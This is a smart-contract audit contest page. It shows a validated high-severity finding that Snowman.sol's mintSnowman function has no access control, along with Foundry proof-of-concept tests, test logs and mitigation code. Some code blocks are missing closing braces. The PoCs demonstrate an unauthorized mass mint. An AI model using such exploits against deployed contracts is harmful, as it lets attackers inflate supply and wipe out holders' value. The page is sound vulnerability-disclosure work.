Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

: Snowman.sol — Unrestricted Public mintSnowman Function Allows Anyone to Mint Unlimited NFTs, Bypassing the Entire Snow Staking Protocol

bamgboseoluwole83

### Description

The `mintSnowman` function in `Snowman.sol` is missing access control modifiers, allowing unauthorized external actors to mint unlimited NFTs without interacting with the intended staking mechanism.

The `mintSnowman` function is explicitly declared as an `external` function but lacks any access restrictions such as an `onlyOwner` modifier or a custom role check tracking the `SnowmanAirdrop` contract.

```solidity

// Snowman.sol

function mintSnowman(address receiver, uint256 amount) external { // @> Vulnerability: Completely public/external with no modifiers

for (uint256 i = 0; i < amount; i++) {

s_TokenCounter++;

_safeMint(receiver, s_TokenCounter);

}

```

Because of this omission, any arbitrary external address can call this function directly. This entirely circumvents the protocol's core invariant, which requires users to lock up and stake Snow tokens via the `SnowmanAirdrop` contract to earn a Snowman NFT allocation.

### Risk

Critical / High. The entire value model of the protocol is broken. An attacker can dilute the NFT total supply to infinity instantly, destroying the utility and demand of the Snow staking token. Stakers lose their financial incentives, causing complete capital loss for honest protocol participants.

The vulnerability requires zero special conditions, flash loans, or pre-requisite capital to execute. The execution payload is a simple direct contract call.

### Proof of Concept

Add the following test case to your Foundry testing suite to verify the exploit condition:

```solidity

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "forge-std/Test.sol";

import "../src/Snowman.sol";

contract SnowmanExploitTest is Test {

Snowman public snowman;

address public attacker = address(0xBAD);

function setUp() public {

snowman = new Snowman("Snowman", "SNOW");

}

function test_UnrestrictedMintExploit() public {

// Confirm attacker starts with 0 balance

assertEq(snowman.balanceOf(attacker), 0);

// Attacker calls external function directly bypassing staking requirements

vm.prank(attacker);

snowman.mintSnowman(attacker, 100);

// Attacker successfully minted 100 NFTs for free

assertEq(snowman.balanceOf(attacker), 100);

assertEq(snowman.totalSupply(), 100);

}

```

Run the test to validate:

```bash

forge test --match-test test_UnrestrictedMintExploit -vvv

```

### Tools Used

Manual Review, Foundry, CodeHawks IDE.

### Recommended Mitigation

Restrict the `mintSnowman` function using an access control mechanism. Store the address of the authorized `SnowmanAirdrop` contract, ensuring only that specific contract instance can call the mint routing.

Update `Snowman.sol` to enforce authorization boundaries:

```solidity

address public immutable i_airdropContract;

error Snowman__NotAirdropContract();

modifier onlyAirdrop() {

if (msg.sender != i_airdropContract) {

revert Snowman__NotAirdropContract();

}

// Pass the staking contract address during initialization

constructor(string memory name, string memory symbol, address _airdropContract) ERC721(name, symbol) {

i_airdropContract = _airdropContract;

}

// Apply the authorization modifier to secure the function

function mintSnowman(address receiver, uint256 amount) external onlyAirdrop {

for (uint256 i = 0; i < amount; i++) {

s_TokenCounter++;

_safeMint(receiver, s_TokenCounter);

}

```

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 2 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!